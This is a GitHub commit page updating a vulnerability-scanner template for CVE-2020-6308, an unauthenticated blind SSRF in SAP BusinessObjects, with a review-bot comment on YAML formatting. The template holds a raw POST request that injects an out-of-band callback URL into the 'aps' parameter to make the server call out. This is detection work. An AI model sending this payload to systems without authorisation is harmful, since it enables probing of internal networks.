Merge pull request #5728 from tess-ss/patch-27

Update CVE-2020-6308.yaml
patch-1
Prince Chaddha 2022-10-28 19:26:26 +05:30 committed by GitHub
commit c9ec5578c8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 16 additions and 7 deletions

@ -1,10 +1,11 @@
id: CVE-2020-6308
info:
name: Unauthenticated Blind SSRF in SAP
name: SAP - Unauthenticated Blind SSRF
author: madrobot
severity: medium
description: SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.
description: |
SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.
reference:
- https://github.com/InitRoot/CVE-2020-6308-PoC
- https://launchpad.support.sap.com/#/notes/2943844
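Review bot: switching `description:` to a `|` block scalar gains nothing while the whole text still sits on a single line; either wrap it into several indented lines or keep the plain scalar. Note that with the block form every continuation line must be indented under `description:`, otherwise the template fails YAML parsing (indentation is not visible in the rendered hunk, so please confirm it locally). While here, "versions - 410, 420, 430, allows" reads more cleanly as "versions 410, 420 and 430 allows".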
@ -14,17 +15,25 @@ info:
cvss-score: 5.3
cve-id: CVE-2020-6308
cwe-id: CWE-918
tags: cve,cve2020,sap,ssrf,oast,blind
tags: cve,cve2020,sap,ssrf,oast,unauth
requests:
- method: POST
path:
- '{{BaseURL}}/AdminTools/querybuilder/logon?framework='
- raw:
- |
POST /AdminTools/querybuilder/logon?framework= HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
aps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: location
words:
- "{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"